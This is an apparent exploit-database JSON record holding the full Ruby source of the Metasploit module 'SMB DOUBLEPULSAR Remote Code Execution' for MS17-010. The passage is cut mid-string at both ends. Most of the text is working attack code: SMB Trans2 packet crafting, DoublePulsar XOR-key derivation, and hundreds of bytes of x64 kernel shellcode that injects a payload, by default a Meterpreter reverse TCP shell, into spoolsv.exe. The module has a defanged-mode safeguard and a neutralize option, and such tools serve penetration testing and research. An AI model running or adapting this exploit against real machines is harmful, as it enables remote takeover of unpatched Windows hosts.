\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-18] #"}, "lastseen": "2021-10-18T18:16:51", "differentElements": ["sourceData"], "edition": 47}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "cb989386f33f92691235ca91acca860a", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-18T22:16:33", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T22:16:33", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-18T22:16:33", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n 